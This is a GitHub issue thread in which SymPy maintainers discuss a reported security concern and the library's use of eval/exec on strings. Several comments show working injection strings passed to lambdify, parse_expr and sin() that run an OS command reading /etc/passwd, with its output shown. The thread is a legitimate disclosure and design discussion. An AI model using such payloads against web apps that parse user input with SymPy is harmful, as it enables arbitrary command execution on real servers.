### ISSUE TITLE
Found a possible security concern

### ISSUE THREAD

**Issue by psmoros** [sympy/sympy#24990]
Hello 👋

I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@ready-research) has found a potential issue, which I would be eager to share with you.

Could you add a `SECURITY.md` file with an e-mail address for me to send further details to? GitHub [recommends](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.

Looking forward to hearing from you 👍

(cc @huntr-helper)

**Comment by bjodah** [comment]
SymPy already use `eval`/`exec` on strings. Using sympy is like using a shell: if you give shell access to a person, well then you better trust that person. Same goes for SymPy.
```pycon
>>> from sympy import Symbol, lambdify
>>> x, a = Symbol('x'), Symbol('__import__("os").system("echo good-luck-sanitizing-your-input; head /etc/passwd")')
>>> f = lambdify([x], a)
>>> f(42)
good-luck-sanitizing-your-input
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
0
```

**Comment by oscarbenjamin** [comment]
> Could you add a `SECURITY.md` file with an e-mail address for me to send further details to?

Can you point to an example of another repo that has this? I haven't seen such a file before and I'm not sure what should go in it.

> A researcher (@ready-research) has found a potential issue, which I would be eager to share with you.

Please email me (oscar.j.benjamin@gmail.com). I will reply CCing other relevant people.

**Comment by sylee957** [comment]
> SymPy already use `eval`/`exec` on strings. Using sympy is like using a shell: if you give shell access to a person, well then you better trust that person. Same goes for SymPy.
> 
> ```
> >>> from sympy import Symbol, lambdify
> >>> x, a = Symbol('x'), Symbol('__import__("os").system("echo good-luck-sanitizing-your-input; head /etc/passwd")')
> >>> f = lambdify([x], a)
> >>> f(42)
> good-luck-sanitizing-your-input
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/usr/sbin/nologin
> man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
> lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
> mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
> 0
> ```

We can completely avoid such vulnerability by designing the compilers differently, such as substituting the symbol names.

**Comment by bjodah** [comment]
Right, I was just speaking to the situation at hand.

**Comment by asmeurer** [comment]
The reported issue was not about the use of eval/exec. I do disagree with this, though:

> Using sympy is like using a shell: if you give shell access to a person, well then you better trust that person. Same goes for SymPy.

SymPy isn't like a shell. A shell executes arbitrary commands by design. But SymPy is just a mathematics library. It's reasonable for users to expect it to not execute arbitrary commands just by interfacing with mathematical formulae. And the use of eval/exec in sympify and lambdify (esp. in sympify) is an implementation detail, which isn't fundamental to what it is doing. Both can (and should) function just fine without these vulnerabilities being present.

**Comment by bjodah** [comment]
It extends beyond just lambdify. Wherever we taking lambda functions (`replace` comes to mind) we essentially expect the user to input arbitrary python code. Python started out as a scripting language, hence my reference to shell(scripting).

**Comment by sylee957** [comment]
I think that callback interfaces in `replace` are different, because they are already accepting the procedures than strings.
However, the vulnerabilities in the parsers are more dangerous because they are used more commonly in applications to accept untrusted input from the users, and I'd already consider them bugs if the parsers have side effects than it originally designed for.

**Comment by bjodah** [comment]
Right, but if one expects to use various SymPy functions *today* in a web-app, then I think expectations need to be managed. I could see someone reaching for [parse_expr](https://docs.sympy.org/latest/modules/parsing.html) when accepting user input in a webapp.

Well, then you better run that webapp in per session isolation:
```pycon
>>> parse_expr("__import__(\"os\").system(\"head -n 1 /etc/passwd\")")                                                                                                                  
root:x:0:0:root:/root:/bin/bash
```
or maybe this one is even more fun:
```pycon
>>> sin("__import__(\"os\").system(\"head -n 1 /etc/passwd\")")                                                                                                                         
root:x:0:0:root:/root:/bin/bash                                                                                                                                                             
---------------------------------------------------------------------------                                                                                                                 
AttributeError                            Traceback (most recent call last
...
File /usr/local/lib/python3.11/dist-packages/sympy/functions/elementary/trigonometric.py:283, in sin.eval(cls, arg)                                                                         
    281 from sympy.calculus.accumulationbounds import AccumBounds                                                                                                                           
    282 from sympy.sets.setexpr import SetExpr                                                                                                                                              
--> 283 if arg.is_Number:                                                                                                                                                                   
    284     if arg is S.NaN:                                                                                                                                                                
    285         return S.NaN                                                                                                                                                                
                                                                                                                                                                                            
AttributeError: 'int' object has no attribute 'is_Number' 
```
